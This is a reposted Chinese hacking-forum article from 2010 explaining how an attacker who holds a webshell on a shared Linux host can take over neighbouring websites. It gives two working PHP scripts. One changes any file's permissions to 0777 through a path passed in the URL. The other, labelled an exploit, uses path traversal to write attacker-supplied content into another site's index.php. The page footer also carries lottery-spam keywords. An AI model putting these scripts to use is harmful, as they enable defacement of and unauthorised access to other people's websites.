歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

linux下用webshell對文件權限的修改

來源:轉載 作者:佚名 時間:2010-05-16 TAG: 我要投稿
yesu(http://hi.baidu.com/3hack_yesu/) 

當我們擁有了一個linux下的shell(服務器上多個網站)。 

這個shell對所在站點的根目錄有可寫入權限,甚至能查看其他網站的目錄。 

那么,這樣的主機設置肯定是不安全的。 

有的時候,我們想對獲得同服務器的其他站的權限,比如直接對其他站點的index.php進行修改,卻發現沒有權限。 

我們可以嘗試通過以下腳本來實現對其他站點的文件添加權限。 

代碼: 

<?php 
$path = stripslashes($_GET[’path’]); 
$ok = chmod ($path , 0777); 
if ($ok == true) 
echo " CHMOD OK , Permission editable file or directory. Permission to write"; 
?> 

保存為chmod.PHP 

使用方法簡單,訪問 

http://site/chmod.php?path=../../其他站點的目錄/index.php 

這里的index.PHP是要修改權限的文件。 


另外一個exploit: 

把下面的代碼保存為exploit.PHP 

代碼: 

<?php 

         @$filename = stripslashes($_POST[’filename’]); 
         @$mess = stripslashes($_POST[’mess’]);    
     $fp = @fopen("{$_POST[’filename’]}", ’a’); 
         @fputs($fp,"$mess <hr size=\"1\" color=\"black\">"); 
         @fclose($fp); 
?>  

<form name="form1" action="exploit.php" method="post"> 
<p align="center"><b> 
<br> 
CODE :<br> 
<textarea name="mess" rows="3"></textarea></font></b></textarea> 
</font></b> <p><input type="hidden" name="filename" value="../../AUTRE WEBSITE SUR LE MULTIHOSTING/index.php"></p> 
<center> 
<input type="reset" name="Submit" value="Delete"> 
<input name="go" type="submit" value="Send" > 
<center> 
</form> 
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> 
<title>Changing CHMOD Permissions Exploit - Contact : the_gl4di4t0r[AT]hotmail[DOT]com</title> 
</head> 
<body> 
</center> 
</body> 
【聲明】:黑吧安全網(http://www.650547.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected],我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        安徽快3自由的百科 北京拾赛车开奖结果 湖北11选五遗漏直选3 浙江11选5组2组3 pk10软件旗舰版 广西体彩11选5官网 浙江11选5中奖规则 五分快三投注稳赚技巧 浙江6+1计划 广东快中彩开奖结果 黑龙江22选5开奖数据